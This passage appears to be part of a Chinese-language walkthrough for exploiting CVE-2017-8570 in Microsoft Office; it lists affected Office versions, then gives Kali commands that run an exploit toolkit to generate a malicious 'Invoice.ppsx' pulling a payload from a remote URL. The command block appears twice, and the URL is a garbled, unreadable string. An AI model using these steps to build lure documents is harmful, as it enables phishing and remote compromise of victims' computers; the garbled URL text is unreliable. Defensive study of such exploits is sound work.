Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition)
5.分析步骤:
1.生成恶意ppsx文件
xshell连接kali主机
在kali下执行如下命令:
cd CVE‐2017‐8570 //进入exploit的目录
python cve‐2017‐8570_toolkit.py ‐M gen ‐w Invoice.ppsx ‐u
cbbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3L8r3!0Y4L8#2)9J5k6h3c8G2j5#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6Q4x3V1k6Q4c8e0N6Q4z5e0c8Q4z5f1k6Q4c8e0k6Q4z5o6S2Q4z5e0m8H3M7s2y4^5i4@1f1$3i4K6R3I4i4@1t1$3i4@1f1$3i4K6R3@1i4K6S2r3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3
cd CVE‐2017‐8570 //进入exploit的目录
python cve‐2017‐8570_toolkit.py ‐M gen ‐w Invoice.ppsx ‐u
cbbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3L8r3!0Y4L8#2)9J5k6h3c8G2j5#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6Q4x3V1k6Q4c8e0N6Q4z5e0c8Q4z5f1k6Q4c8e0k6Q4z5o6S2Q4z5e0m8H3M7s2y4^5i4@1f1$3i4K6R3I4i4@1t1$3i4@1f1$3i4K6R3@1i4K6S2r3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3